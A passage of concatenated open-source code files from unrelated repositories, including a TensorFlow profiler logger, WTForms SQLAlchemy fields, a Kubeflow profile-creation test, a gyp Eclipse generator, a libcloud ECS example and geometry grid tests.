module_controller.modules[repo.sync_type]['validate_config'] return validated(repo, logger).repo_checks() return True
martinwicke/tensorflow
refs/heads/master
tensorflow/contrib/tfprof/python/tools/tfprof/tfprof_logger.py
9
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Logging tensorflow::tfprof::OpLog. OpLog is used to add extra model information for offline analysis by tfprof. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import tensorflow as tf from tensorflow.python.framework import ops from tensorflow.tools.tfprof import tfprof_log_pb2 TRAINABLE_VARIABLES = '_trainable_variables' REGISTERED_FLOP_STATS = 'flops' def _fill_missing_graph_shape(graph, run_meta): """Fill Tensor shapes in 'graph' with run time shape from 'run_meta'.""" for dev_stat in run_meta.step_stats.dev_stats: for node_stat in dev_stat.node_stats: if not node_stat.output: continue try: op = graph.get_operation_by_name(node_stat.node_name) except KeyError as e: # Graph doesn't contains the node_stat, usually RecvTensor. continue if len(node_stat.output) != len(op.outputs): # For example, conditional op has only 1 output at run time. continue for (i, node_stat_out) in enumerate(node_stat.output): if op.outputs[i].get_shape().is_fully_defined(): continue node_stat_dims = node_stat_out.tensor_description.shape.dim node_stat_shape = tf.TensorShape([d.size for d in node_stat_dims]) try: op.outputs[i].set_shape(op.outputs[i].get_shape().merge_with( node_stat_shape)) except ValueError as e: sys.stderr.write('Node %s incompatible shapes: %s.\n' % (node_stat.node_name, e)) return graph def _get_logged_ops(graph, run_meta=None): """Extract trainable model parameters and FLOPs for ops from a Graph. Args: graph: tf.Graph. run_meta: RunMetadata proto used to complete shape information. Returns: logged_ops: dict mapping from op_name to OpLogEntry. """ if run_meta: graph = _fill_missing_graph_shape(graph, run_meta) op_missing_shape = 0 logged_ops = {} graph_def = graph.as_graph_def() for node in graph_def.node: try: stats = ops.get_stats_for_node_def(graph, node, REGISTERED_FLOP_STATS) except ValueError: # Catch Exception When shape is incomplete. Skip it. op_missing_shape += 1 stats = None if not stats or not stats.value: continue if node.name not in logged_ops: entry = tfprof_log_pb2.OpLogEntry() entry.name = node.name entry.float_ops = int(stats.value) logged_ops[entry.name] = entry for v in graph.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): if v.op.name not in logged_ops: entry = tfprof_log_pb2.OpLogEntry() entry.name = v.op.name entry.types.append(TRAINABLE_VARIABLES) logged_ops[entry.name] = entry else: logged_ops[v.op.name].types.append(TRAINABLE_VARIABLES) if op_missing_shape > 0 and not run_meta: sys.stderr.write( '%d ops no flops stats due to incomplete shapes. ' 'Consider passing run_meta to use run_time shapes.\n' % op_missing_shape) return logged_ops def _merge_default_with_oplog(graph, op_log=None, run_meta=None): """Merge the tfprof default extra info with caller's op_log. Args: graph: tf.Graph. op_log: OpLog proto. run_meta: RunMetadata proto used to complete shape information. Returns: tmp_op_log: Merged OpLog proto. """ tmp_op_log = tfprof_log_pb2.OpLog() logged_ops = _get_logged_ops(graph, run_meta) if not op_log: tmp_op_log.log_entries.extend(logged_ops.values()) else: all_ops = dict() for entry in op_log.log_entries: all_ops[entry.name] = entry for op_name, entry in logged_ops.iteritems(): if op_name in all_ops: all_ops[op_name].types.extend(entry.types) if entry.float_ops > 0 and all_ops[op_name].float_ops == 0: all_ops[op_name].float_ops = entry.float_ops else: all_ops[op_name] = entry tmp_op_log.log_entries.extend(all_ops.values()) return tmp_op_log def write_op_log(graph, log_dir, op_log=None, run_meta=None): """Log provided 'op_log', and add additional model information below. The API also assigns ops in tf.trainable_variables() an op type called '_trainable_variables'. The API also logs 'flops' statistics for ops with op.RegisterStatistics() defined. flops calculation depends on Tensor shapes defined in 'graph', which might not be complete, 'run_meta', if provided, completes the shape information with best effort. Args: graph: tf.Graph. log_dir: directory to write the log file. op_log: (Optional) OpLog proto to be written. If not provided, an new one is created. run_meta: (Optional) RunMetadata proto that helps flops computation using run time shape information. """ op_log = _merge_default_with_oplog(graph, op_log, run_meta) with tf.gfile.Open(os.path.join(log_dir, 'tfprof_log'), 'w') as log: log.write(op_log.SerializeToString())
xsynergy510x/android_external_chromium_org
refs/heads/cm-12.1
build/android/pylib/gtest/test_options.py
44
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Defines the GTestOptions named tuple.""" import collections GTestOptions = collections.namedtuple('GTestOptions', [ 'tool', 'cleanup_test_files', 'push_deps', 'gtest_filter', 'run_disabled', 'test_arguments', 'timeout', 'isolate_file_path', 'suite_name'])
ryanmockabee/golfr
refs/heads/master
flask/lib/python3.6/site-packages/wtforms/ext/sqlalchemy/fields.py
177
""" Useful form fields for use with SQLAlchemy ORM. """ from __future__ import unicode_literals import operator from wtforms import widgets from wtforms.compat import text_type, string_types from wtforms.fields import SelectFieldBase from wtforms.validators import ValidationError try: from sqlalchemy.orm.util import identity_key has_identity_key = True except ImportError: has_identity_key = False __all__ = ( 'QuerySelectField', 'QuerySelectMultipleField', ) class QuerySelectField(SelectFieldBase): """ Will display a select drop-down field to choose between ORM results in a sqlalchemy `Query`. The `data` property actually will store/keep an ORM model instance, not the ID. Submitting a choice which is not in the query will result in a validation error. This field only works for queries on models whose primary key column(s) have a consistent string representation. This means it mostly only works for those composed of string, unicode, and integer types. For the most part, the primary keys will be auto-detected from the model, alternately pass a one-argument callable to `get_pk` which can return a unique comparable key. The `query` property on the field can be set from within a view to assign a query per-instance to the field. If the property is not set, the `query_factory` callable passed to the field constructor will be called to obtain a query. Specify `get_label` to customize the label associated with each option. If a string, this is the name of an attribute on the model object to use as the label text. If a one-argument callable, this callable will be passed model instance and expected to return the label text. Otherwise, the model object's `__str__` or `__unicode__` will be used. If `allow_blank` is set to `True`, then a blank choice will be added to the top of the list. Selecting this choice will result in the `data` property being `None`. The label for this blank choice can be set by specifying the `blank_text` parameter. """ widget = widgets.Select() def __init__(self, label=None, validators=None, query_factory=None, get_pk=None, get_label=None, allow_blank=False, blank_text='', **kwargs): super(QuerySelectField, self).__init__(label, validators, **kwargs) self.query_factory = query_factory if get_pk is None: if not has_identity_key: raise Exception('The sqlalchemy identity_key function could not be imported.') self.get_pk = get_pk_from_identity else: self.get_pk = get_pk if get_label is None: self.get_label = lambda x: x elif isinstance(get_label, string_types): self.get_label = operator.attrgetter(get_label) else: self.get_label = get_label self.allow_blank = allow_blank self.blank_text = blank_text self.query = None self._object_list = None def _get_data(self): if self._formdata is not None: for pk, obj in self._get_object_list(): if pk == self._formdata: self._set_data(obj) break return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def _get_object_list(self): if self._object_list is None: query = self.query or self.query_factory() get_pk = self.get_pk self._object_list = list((text_type(get_pk(obj)), obj) for obj in query) return self._object_list def iter_choices(self): if self.allow_blank: yield ('__None', self.blank_text, self.data is None) for pk, obj in self._get_object_list(): yield (pk, self.get_label(obj), obj == self.data) def process_formdata(self, valuelist): if valuelist: if self.allow_blank and valuelist[0] == '__None': self.data = None else: self._data = None self._formdata = valuelist[0] def pre_validate(self, form): data = self.data if data is not None: for pk, obj in self._get_object_list(): if data == obj: break else: raise ValidationError(self.gettext('Not a valid choice')) elif self._formdata or not self.allow_blank: raise ValidationError(self.gettext('Not a valid choice')) class QuerySelectMultipleField(QuerySelectField): """ Very similar to QuerySelectField with the difference that this will display a multiple select. The data property will hold a list with ORM model instances and will be an empty list when no value is selected. If any of the items in the data list or submitted form data cannot be found in the query, this will result in a validation error. """ widget = widgets.Select(multiple=True) def __init__(self, label=None, validators=None, default=None, **kwargs): if default is None: default = [] super(QuerySelectMultipleField, self).__init__(label, validators, default=default, **kwargs) if kwargs.get('allow_blank', False): import warnings warnings.warn('allow_blank=True does not do anything for QuerySelectMultipleField.') self._invalid_formdata = False def _get_data(self): formdata = self._formdata if formdata is not None: data = [] for pk, obj in self._get_object_list(): if not formdata: break elif pk in formdata: formdata.remove(pk) data.append(obj) if formdata: self._invalid_formdata = True self._set_data(data) return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def iter_choices(self): for pk, obj in self._get_object_list(): yield (pk, self.get_label(obj), obj in self.data) def process_formdata(self, valuelist): self._formdata = set(valuelist) def pre_validate(self, form): if self._invalid_formdata: raise ValidationError(self.gettext('Not a valid choice')) elif self.data: obj_list = list(x[1] for x in self._get_object_list()) for v in self.data: if v not in obj_list: raise ValidationError(self.gettext('Not a valid choice')) def get_pk_from_identity(obj): cls, key = identity_key(instance=obj) return ':'.join(text_type(x) for x in key)
kubeflow/kfctl
refs/heads/master
py/kubeflow/kfctl/testing/pytests/kfam_test.py
1
import logging import pytest from kubeflow.testing import util import json from retrying import retry from time import sleep import uuid from kubeflow.kfctl.testing.util import aws_util as kfctl_aws_util def test_kfam(record_xml_attribute, cluster_name): util.set_pytest_junit(record_xml_attribute, "test_kfam_e2e") kfctl_aws_util.aws_auth_load_kubeconfig(cluster_name) getcmd = "kubectl get pods -n kubeflow -l=app=jupyter-web-app --template '{{range.items}}{{.metadata.name}}{{end}}'" jupyterpod = util.run(getcmd.split(' '))[1:-1] logging.info("accessing kfam svc from jupyter pod %s" % jupyterpod) sleep(10) # Profile Creation profile_name = "testprofile-%s" % uuid.uuid4().hex[0:7] util.run(['kubectl', 'exec', jupyterpod, '-n', 'kubeflow', '--', 'curl', '--silent', '-X', 'POST', '-d', '{"metadata":{"name":"%s"},"spec":{"owner":{"kind":"User","name":"user1@kubeflow.org"}}}' % profile_name, 'profiles-kfam.kubeflow:8081/kfam/v1/profiles']) assert verify_profile_creation(jupyterpod, profile_name) @retry(wait_fixed=2000, stop_max_delay=20 * 1000) def verify_profile_creation(jupyterpod, profile_name): # Verify Profile Creation bindingsstr = util.run(['kubectl', 'exec', jupyterpod, '-n', 'kubeflow', '--', 'curl', '--silent', 'profiles-kfam.kubeflow:8081/kfam/v1/bindings']) bindings = json.loads(bindingsstr) if profile_name not in [binding['referredNamespace'] for binding in bindings['bindings']]: raise Exception("testprofile not created yet!") return True if __name__ == "__main__": logging.basicConfig(level=logging.INFO, format=('%(levelname)s|%(asctime)s' '|%(pathname)s|%(lineno)d| %(message)s'), datefmt='%Y-%m-%dT%H:%M:%S', ) logging.getLogger().setLevel(logging.INFO) pytest.main()
refeed/coala-bears
refs/heads/master
bears/vcs/git/GitCommitBear.py
1
import os import shutil import re from bears.vcs.CommitBear import _CommitBear from coala_utils.ContextManagers import change_directory from coalib.misc.Shell import run_shell_command class GitCommitBear(_CommitBear): LANGUAGES = {'Git'} ASCIINEMA_URL = 'https://asciinema.org/a/e146c9739ojhr8396wedsvf0d' @classmethod def check_prerequisites(cls): if shutil.which('git') is None: return 'git is not installed.' else: return True def get_remotes(): remotes, _ = run_shell_command( "git config --get-regex '^remote.*.url$'") return remotes def get_head_commit(self): with change_directory(self.get_config_dir() or os.getcwd()): command = self.check_github_pull_request_temporary_merge_commit() if command: return run_shell_command(command) return run_shell_command('git log -1 --pretty=%B') def check_github_pull_request_temporary_merge_commit(self): """ This function creates a git command to fetch the unmerged parent commit shortlog from a commit generated by GitHub in a refs/pull/(\d+)/merge git remote reference. Visit https://github.com/travis-ci/travis-ci/issues/8400 for more details. :return: A git command (str) to fetch the unmerged parent commit if HEAD commit is a GitHub PR temporary merge commit, otherwise None" """ stdout, _ = run_shell_command('git log -1 --pretty=%B') pos = stdout.find('\n') shortlog = stdout[:pos] if pos != -1 else stdout github_pull_request_temporary_merge_commit_regex = re.compile( r'^Merge ([0-9a-f]{40}) into ([0-9a-f]{40})$') match = re.fullmatch( github_pull_request_temporary_merge_commit_regex, shortlog) if match: unmerged_commit_sha = match.group(1) command = ('git log -n 1 --pretty=%B ' + unmerged_commit_sha) return command
Linkinzoo/H5Exercise
refs/heads/master
Task11_SASS学习/JiKe/node_modules/node-gyp/gyp/pylib/gyp/generator/eclipse.py
1825
# Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """GYP backend that generates Eclipse CDT settings files. This backend DOES NOT generate Eclipse CDT projects. Instead, it generates XML files that can be imported into an Eclipse CDT project. The XML file contains a list of include paths and symbols (i.e. defines). Because a full .cproject definition is not created by this generator, it's not possible to properly define the include dirs and symbols for each file individually. Instead, one set of includes/symbols is generated for the entire project. This works fairly well (and is a vast improvement in general), but may still result in a few indexer issues here and there. This generator has no automated tests, so expect it to be broken. """ from xml.sax.saxutils import escape import os.path import subprocess import gyp import gyp.common import gyp.msvs_emulation import shlex import xml.etree.cElementTree as ET generator_wants_static_library_dependencies_adjusted = False generator_default_variables = { } for dirname in ['INTERMEDIATE_DIR', 'PRODUCT_DIR', 'LIB_DIR', 'SHARED_LIB_DIR']: # Some gyp steps fail if these are empty(!), so we convert them to variables generator_default_variables[dirname] = '$' + dirname for unused in ['RULE_INPUT_PATH', 'RULE_INPUT_ROOT', 'RULE_INPUT_NAME', 'RULE_INPUT_DIRNAME', 'RULE_INPUT_EXT', 'EXECUTABLE_PREFIX', 'EXECUTABLE_SUFFIX', 'STATIC_LIB_PREFIX', 'STATIC_LIB_SUFFIX', 'SHARED_LIB_PREFIX', 'SHARED_LIB_SUFFIX', 'CONFIGURATION_NAME']: generator_default_variables[unused] = '' # Include dirs will occasionally use the SHARED_INTERMEDIATE_DIR variable as # part of the path when dealing with generated headers. This value will be # replaced dynamically for each configuration. generator_default_variables['SHARED_INTERMEDIATE_DIR'] = \ '$SHARED_INTERMEDIATE_DIR' def CalculateVariables(default_variables, params): generator_flags = params.get('generator_flags', {}) for key, val in generator_flags.items(): default_variables.setdefault(key, val) flavor = gyp.common.GetFlavor(params) default_variables.setdefault('OS', flavor) if flavor == 'win': # Copy additional generator configuration data from VS, which is shared # by the Eclipse generator. import gyp.generator.msvs as msvs_generator generator_additional_non_configuration_keys = getattr(msvs_generator, 'generator_additional_non_configuration_keys', []) generator_additional_path_sections = getattr(msvs_generator, 'generator_additional_path_sections', []) gyp.msvs_emulation.CalculateCommonVariables(default_variables, params) def CalculateGeneratorInputInfo(params): """Calculate the generator specific info that gets fed to input (called by gyp).""" generator_flags = params.get('generator_flags', {}) if generator_flags.get('adjust_static_libraries', False): global generator_wants_static_library_dependencies_adjusted generator_wants_static_library_dependencies_adjusted = True def GetAllIncludeDirectories(target_list, target_dicts, shared_intermediate_dirs, config_name, params, compiler_path): """Calculate the set of include directories to be used. Returns: A list including all the include_dir's specified for every target followed by any include directories that were added as cflag compiler options. """ gyp_includes_set = set() compiler_includes_list = [] # Find compiler's default include dirs. if compiler_path: command = shlex.split(compiler_path) command.extend(['-E', '-xc++', '-v', '-']) proc = subprocess.Popen(args=command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) output = proc.communicate()[1] # Extract the list of include dirs from the output, which has this format: # ... # #include "..." search starts here: # #include <...> search starts here: # /usr/include/c++/4.6 # /usr/local/include # End of search list. # ... in_include_list = False for line in output.splitlines(): if line.startswith('#include'): in_include_list = True continue if line.startswith('End of search list.'): break if in_include_list: include_dir = line.strip() if include_dir not in compiler_includes_list: compiler_includes_list.append(include_dir) flavor = gyp.common.GetFlavor(params) if flavor == 'win': generator_flags = params.get('generator_flags', {}) for target_name in target_list: target = target_dicts[target_name] if config_name in target['configurations']: config = target['configurations'][config_name] # Look for any include dirs that were explicitly added via cflags. This # may be done in gyp files to force certain includes to come at the end. # TODO(jgreenwald): Change the gyp files to not abuse cflags for this, and # remove this. if flavor == 'win': msvs_settings = gyp.msvs_emulation.MsvsSettings(target, generator_flags) cflags = msvs_settings.GetCflags(config_name) else: cflags = config['cflags'] for cflag in cflags: if cflag.startswith('-I'): include_dir = cflag[2:] if include_dir not in compiler_includes_list: compiler_includes_list.append(include_dir) # Find standard gyp include dirs. if config.has_key('include_dirs'): include_dirs = config['include_dirs'] for shared_intermediate_dir in shared_intermediate_dirs: for include_dir in include_dirs: include_dir = include_dir.replace('$SHARED_INTERMEDIATE_DIR', shared_intermediate_dir) if not os.path.isabs(include_dir): base_dir = os.path.dirname(target_name) include_dir = base_dir + '/' + include_dir include_dir = os.path.abspath(include_dir) gyp_includes_set.add(include_dir) # Generate a list that has all the include dirs. all_includes_list = list(gyp_includes_set) all_includes_list.sort() for compiler_include in compiler_includes_list: if not compiler_include in gyp_includes_set: all_includes_list.append(compiler_include) # All done. return all_includes_list def GetCompilerPath(target_list, data, options): """Determine a command that can be used to invoke the compiler. Returns: If this is a gyp project that has explicit make settings, try to determine the compiler from that. Otherwise, see if a compiler was specified via the CC_target environment variable. """ # First, see if the compiler is configured in make's settings. build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0]) make_global_settings_dict = data[build_file].get('make_global_settings', {}) for key, value in make_global_settings_dict: if key in ['CC', 'CXX']: return os.path.join(options.toplevel_dir, value) # Check to see if the compiler was specified as an environment variable. for key in ['CC_target', 'CC', 'CXX']: compiler = os.environ.get(key) if compiler: return compiler return 'gcc' def GetAllDefines(target_list, target_dicts, data, config_name, params, compiler_path): """Calculate the defines for a project. Returns: A dict that includes explict defines declared in gyp files along with all of the default defines that the compiler uses. """ # Get defines declared in the gyp files. all_defines = {} flavor = gyp.common.GetFlavor(params) if flavor == 'win': generator_flags = params.get('generator_flags', {}) for target_name in target_list: target = target_dicts[target_name] if flavor == 'win': msvs_settings = gyp.msvs_emulation.MsvsSettings(target, generator_flags) extra_defines = msvs_settings.GetComputedDefines(config_name) else: extra_defines = [] if config_name in target['configurations']: config = target['configurations'][config_name] target_defines = config['defines'] else: target_defines = [] for define in target_defines + extra_defines: split_define = define.split('=', 1) if len(split_define) == 1: split_define.append('1') if split_define[0].strip() in all_defines: # Already defined continue all_defines[split_define[0].strip()] = split_define[1].strip() # Get default compiler defines (if possible). if flavor == 'win': return all_defines # Default defines already processed in the loop above. if compiler_path: command = shlex.split(compiler_path) command.extend(['-E', '-dM', '-']) cpp_proc = subprocess.Popen(args=command, cwd='.', stdin=subprocess.PIPE, stdout=subprocess.PIPE) cpp_output = cpp_proc.communicate()[0] cpp_lines = cpp_output.split('\n') for cpp_line in cpp_lines: if not cpp_line.strip(): continue cpp_line_parts = cpp_line.split(' ', 2) key = cpp_line_parts[1] if len(cpp_line_parts) >= 3: val = cpp_line_parts[2] else: val = '1' all_defines[key] = val return all_defines def WriteIncludePaths(out, eclipse_langs, include_dirs): """Write the includes section of a CDT settings export file.""" out.write(' <section name="org.eclipse.cdt.internal.ui.wizards.' \ 'settingswizards.IncludePaths">\n') out.write(' <language name="holder for library settings"></language>\n') for lang in eclipse_langs: out.write(' <language name="%s">\n' % lang) for include_dir in include_dirs: out.write(' <includepath workspace_path="false">%s</includepath>\n' % include_dir) out.write(' </language>\n') out.write(' </section>\n') def WriteMacros(out, eclipse_langs, defines): """Write the macros section of a CDT settings export file.""" out.write(' <section name="org.eclipse.cdt.internal.ui.wizards.' \ 'settingswizards.Macros">\n') out.write(' <language name="holder for library settings"></language>\n') for lang in eclipse_langs: out.write(' <language name="%s">\n' % lang) for key in sorted(defines.iterkeys()): out.write(' <macro><name>%s</name><value>%s</value></macro>\n' % (escape(key), escape(defines[key]))) out.write(' </language>\n') out.write(' </section>\n') def GenerateOutputForConfig(target_list, target_dicts, data, params, config_name): options = params['options'] generator_flags = params.get('generator_flags', {}) # build_dir: relative path from source root to our output files. # e.g. "out/Debug" build_dir = os.path.join(generator_flags.get('output_dir', 'out'), config_name) toplevel_build = os.path.join(options.toplevel_dir, build_dir) # Ninja uses out/Debug/gen while make uses out/Debug/obj/gen as the # SHARED_INTERMEDIATE_DIR. Include both possible locations. shared_intermediate_dirs = [os.path.join(toplevel_build, 'obj', 'gen'), os.path.join(toplevel_build, 'gen')] GenerateCdtSettingsFile(target_list, target_dicts, data, params, config_name, os.path.join(toplevel_build, 'eclipse-cdt-settings.xml'), options, shared_intermediate_dirs) GenerateClasspathFile(target_list, target_dicts, options.toplevel_dir, toplevel_build, os.path.join(toplevel_build, 'eclipse-classpath.xml')) def GenerateCdtSettingsFile(target_list, target_dicts, data, params, config_name, out_name, options, shared_intermediate_dirs): gyp.common.EnsureDirExists(out_name) with open(out_name, 'w') as out: out.write('<?xml version="1.0" encoding="UTF-8"?>\n') out.write('<cdtprojectproperties>\n') eclipse_langs = ['C++ Source File', 'C Source File', 'Assembly Source File', 'GNU C++', 'GNU C', 'Assembly'] compiler_path = GetCompilerPath(target_list, data, options) include_dirs = GetAllIncludeDirectories(target_list, target_dicts, shared_intermediate_dirs, config_name, params, compiler_path) WriteIncludePaths(out, eclipse_langs, include_dirs) defines = GetAllDefines(target_list, target_dicts, data, config_name, params, compiler_path) WriteMacros(out, eclipse_langs, defines) out.write('</cdtprojectproperties>\n') def GenerateClasspathFile(target_list, target_dicts, toplevel_dir, toplevel_build, out_name): '''Generates a classpath file suitable for symbol navigation and code completion of Java code (such as in Android projects) by finding all .java and .jar files used as action inputs.''' gyp.common.EnsureDirExists(out_name) result = ET.Element('classpath') def AddElements(kind, paths): # First, we need to normalize the paths so they are all relative to the # toplevel dir. rel_paths = set() for path in paths: if os.path.isabs(path): rel_paths.add(os.path.relpath(path, toplevel_dir)) else: rel_paths.add(path) for path in sorted(rel_paths): entry_element = ET.SubElement(result, 'classpathentry') entry_element.set('kind', kind) entry_element.set('path', path) AddElements('lib', GetJavaJars(target_list, target_dicts, toplevel_dir)) AddElements('src', GetJavaSourceDirs(target_list, target_dicts, toplevel_dir)) # Include the standard JRE container and a dummy out folder AddElements('con', ['org.eclipse.jdt.launching.JRE_CONTAINER']) # Include a dummy out folder so that Eclipse doesn't use the default /bin # folder in the root of the project. AddElements('output', [os.path.join(toplevel_build, '.eclipse-java-build')]) ET.ElementTree(result).write(out_name) def GetJavaJars(target_list, target_dicts, toplevel_dir): '''Generates a sequence of all .jars used as inputs.''' for target_name in target_list: target = target_dicts[target_name] for action in target.get('actions', []): for input_ in action['inputs']: if os.path.splitext(input_)[1] == '.jar' and not input_.startswith('$'): if os.path.isabs(input_): yield input_ else: yield os.path.join(os.path.dirname(target_name), input_) def GetJavaSourceDirs(target_list, target_dicts, toplevel_dir): '''Generates a sequence of all likely java package root directories.''' for target_name in target_list: target = target_dicts[target_name] for action in target.get('actions', []): for input_ in action['inputs']: if (os.path.splitext(input_)[1] == '.java' and not input_.startswith('$')): dir_ = os.path.dirname(os.path.join(os.path.dirname(target_name), input_)) # If there is a parent 'src' or 'java' folder, navigate up to it - # these are canonical package root names in Chromium. This will # break if 'src' or 'java' exists in the package structure. This # could be further improved by inspecting the java file for the # package name if this proves to be too fragile in practice. parent_search = dir_ while os.path.basename(parent_search) not in ['src', 'java']: parent_search, _ = os.path.split(parent_search) if not parent_search or parent_search == toplevel_dir: # Didn't find a known root, just return the original path yield dir_ break else: yield parent_search def GenerateOutput(target_list, target_dicts, data, params): """Generate an XML settings file that can be imported into a CDT project.""" if params['options'].generator_output: raise NotImplementedError("--generator_output not implemented for eclipse") user_config = params.get('generator_flags', {}).get('config', None) if user_config: GenerateOutputForConfig(target_list, target_dicts, data, params, user_config) else: config_names = target_dicts[target_list[0]]['configurations'].keys() for config_name in config_names: GenerateOutputForConfig(target_list, target_dicts, data, params, config_name)
agry/NGECore2
refs/heads/master
scripts/object/soundobject/soundobject_factory_exterior.py
85615
import sys def setup(core, object): return
CGI-Nederland/FreshAir
refs/heads/master
server.py
2
import sys import BaseHTTPServer from SimpleHTTPServer import SimpleHTTPRequestHandler HandlerClass = SimpleHTTPRequestHandler ServerClass = BaseHTTPServer.HTTPServer Protocol = "HTTP/1.0" if sys.argv[1:]: port = int(sys.argv[1]) else: port = 8000 server_address = ('127.0.0.1', port) HandlerClass.protocol_version = Protocol httpd = ServerClass(server_address, HandlerClass) sa = httpd.socket.getsockname() print "Serving HTTP on", sa[0], "port", sa[1], "..." httpd.serve_forever()
wuyuewen/libcloud
refs/heads/trunk
docs/examples/container/ecs/container_registry.py
30
from libcloud.container.types import Provider from libcloud.container.providers import get_driver cls = get_driver(Provider.ECS) # Connect to AWS conn = cls(access_id='SDHFISJDIFJSIDFJ', secret='THIS_IS)+_MY_SECRET_KEY+I6TVkv68o4H', region='ap-southeast-2') # Get a Registry API client for an existing repository client = conn.ex_get_registry_client('my-image') # List all the images for image in client.list_images('my-image'): print(image.name) # Get a specific image image = client.get_image('my-image', '14.04') print(image.path) # >> 647433528374.dkr.ecr.region.amazonaws.com/my-image:14.04 # Deploy that image cluster = conn.list_clusters()[0] container = conn.deploy_container( cluster=cluster, name='my-simple-app', image=image )
geomalgo/geomalgo
refs/heads/master
test/grid2d/test_grid2d.py
2
import unittest import numpy as np from geomalgo import ( Point2D, Grid2D, compute_index, compute_row_col, coord_to_index ) from geomalgo.data import step class TestCoordToIndex(unittest.TestCase): def test_normal(self): """Test index is computed from coordinate""" # -2 -1.5 -1 -0.5 0 0.5 1 1.5 2 # | | | | | | | | | # | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | minval = -2 delta = 0.5 self.assertEqual(coord_to_index( 0.75, minval, delta), 5) self.assertEqual(coord_to_index(-0.75, minval, delta), 2) class TestComputeIndex(unittest.TestCase): def test_normal(self): """Test cell index is computed from cell ix and iy""" # iy # +---+---+---+ # 1 | 3 | 4 | 5 | # +---+---+---+ # 0 | 0 | 1 | 2 | # +---+---+---+ # 0 1 2 ix nx = 3 self.assertEqual(compute_index(nx, 0, 0), 0) self.assertEqual(compute_index(nx, 1, 0), 1) self.assertEqual(compute_index(nx, 2, 0), 2) self.assertEqual(compute_index(nx, 0, 1), 3) self.assertEqual(compute_index(nx, 1, 1), 4) self.assertEqual(compute_index(nx, 2, 1), 5) class TestComputeRowCol(unittest.TestCase): def test_normal(self): """Test cell ix and iy are computed from cell index""" # iy # +---+---+---+ # 1 | 3 | 4 | 5 | # +---+---+---+ # 0 | 0 | 1 | 2 | # +---+---+---+ # 0 1 2 ix nx = 3 self.assertEqual(compute_row_col(0, nx), (0, 0)) self.assertEqual(compute_row_col(1, nx), (1, 0)) self.assertEqual(compute_row_col(2, nx), (2, 0)) self.assertEqual(compute_row_col(3, nx), (0, 1)) self.assertEqual(compute_row_col(4, nx), (1, 1)) self.assertEqual(compute_row_col(5, nx), (2, 1)) class TestGrid2D(unittest.TestCase): def test_find_cell(self): """Test the cell containing a point is found""" # iy # 30 +-------+-------+-------+-------+ # | 4 | 5 | 6 | 7 | # 1 | | | P | | # | | | | | # 20 +-------+-------+-------+-------+ # | 0 | 1 | 2 | 3 | # 0 | Q | | | | # | | | | | # 10 +-------+-------+-------+-------+ # -1 -0.5 0 0.5 1 # 0 1 2 3 ix grid = Grid2D(xmin=-1, xmax=1.0, nx=4, ymin=10, ymax=30, ny=2) P = Point2D(0.25, 25) Q = Point2D(-0.75, 15) cell = grid.find_cell(P) self.assertEqual(cell.ix, 2) self.assertEqual(cell.iy, 1) self.assertEqual(cell.index, 6) cell = grid.find_cell(Q) self.assertEqual(cell.ix, 0) self.assertEqual(cell.iy, 0) self.assertEqual(cell.index, 0) if __name__ == '__main__': unittest.main()
enableiot/iotanalytics-rule-engine
refs/heads/master
pydeps/rules/conditions/processors/matchingPeriodFinder.py
1
# Copyright (c) 2015 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class MatchingPeriodFinder(object): NO_MATCHING_PERIOD = 0 def __init__(self, data): self.data = data self.result = None def get_largest(self, map_function): reduce_fun = ReduceFunctionBuilder().reduce_fun if self.data.isEmpty(): return self.NO_MATCHING_PERIOD self.result = self.__map_and_sort(map_function).coalesce(1).reduce(lambda y, z: reduce_fun(y, z)) if ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD not in self.result: return self.NO_MATCHING_PERIOD if ReduceFunctionBuilder.is_current_greatest(self.result): return self.result[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD] return self.result[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD] def get_largest_start_time(self): if self.result is None: return self.NO_MATCHING_PERIOD if 'period_start' in self.result: return self.result['period_start'] / 1000 return self.result['timestamp'] / 1000 def __map_and_sort(self, map_function): return self.data.map(lambda x: map_function(x)).sortBy(lambda x: x['timestamp']).cache() class ReduceFunctionBuilder(object): LARGEST_MATCHING_PERIOD = 'largest_matching_period' CURRENT_MATCHING_PERIOD = 'current_matching_period' TIMESTAMP = 'timestamp' def reduce_fun(self, x, y): if x['passed'] and y['passed']: self.__increase_current_matching_period(x, y) elif x['passed']: # matching sequence end self.__compare_matching_periods(x, y) else: # no matching data self.__reset_matching_period(x, y) return y def __increase_current_matching_period(self, x, y): y[self.CURRENT_MATCHING_PERIOD] = y[self.TIMESTAMP] - x[self.TIMESTAMP] y[self.TIMESTAMP] = x[self.TIMESTAMP] self.__copy_largest_period(x, y) def __compare_matching_periods(self, x, y): if self.is_current_greatest(x): self.__set_largest_period(x, y) else: self.__copy_largest_period(x, y) y[self.CURRENT_MATCHING_PERIOD] = 0 def __reset_matching_period(self, x, y): y[self.CURRENT_MATCHING_PERIOD] = 0 if self.__has_largest_period(x): self.__copy_largest_period(x, y) @staticmethod def is_current_greatest(value): return not ReduceFunctionBuilder.__has_largest_period(value) \ or 